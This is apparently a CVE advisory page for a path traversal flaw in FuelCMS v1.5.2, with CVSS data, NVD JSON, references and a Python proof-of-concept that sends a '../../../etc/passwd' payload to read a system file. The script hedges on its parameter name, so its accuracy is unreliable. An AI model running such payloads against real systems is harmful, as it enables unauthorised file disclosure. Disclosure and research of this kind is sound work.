Security Vulnerability Report
中文
CVE-2026-30462 CVSS 4.3 MEDIUM

CVE-2026-30462

Published: 2026-04-27 17:16:43
Last Modified: 2026-04-27 18:35:54

Description

A path traversal vulnerability in the Blocks module of Daylight Studio FuelCMS v1.5.2 allows attackers to execute a directory traversal.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Daylight Studio FuelCMS v1.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (adjust the host and path as needed) target_url = "http://localhost/fuel/index.php/fuel/blocks/select/" # PoC parameter for path traversal # Attempting to read /etc/passwd on a Linux system # The exact parameter name ('path' or 'file') may vary based on the controller implementation params = { "path": "../../../etc/passwd" } try: # Send the GET request with the traversal payload response = requests.get(target_url, params=params, timeout=10) # Check if the response indicates a successful read if response.status_code == 200 and "root:" in response.text: print("[+] Vulnerability Exploited Successfully!") print("[+] Sensitive file content found:") print(response.text) else: print("[-] Exploit failed or target not vulnerable.") print("Status Code:", response.status_code) except requests.exceptions.RequestException as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30462", "sourceIdentifier": "[email protected]", "published": "2026-04-27T17:16:42.930", "lastModified": "2026-04-27T18:35:53.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal vulnerability in the Blocks module of Daylight Studio FuelCMS v1.5.2 allows attackers to execute a directory traversal."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "http://daylight.com", "source": "[email protected]"}, {"url": "http://fuelcms.com", "source": "[email protected]"}, {"url": "https://github.com/daylightstudio/FUEL-CMS/blob/master/fuel/modules/fuel/controllers/Blocks.php", "source": "[email protected]"}, {"url": "https://pentest-tools.com/PTT-2025-031-Sensitive-File-Read-via-Path-Traversal.pdf", "source": "[email protected]"}, {"url": "https://pentest-tools.com/PTT-2025-031-Sensitive-File-Read-via-Path-Traversal.pdf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}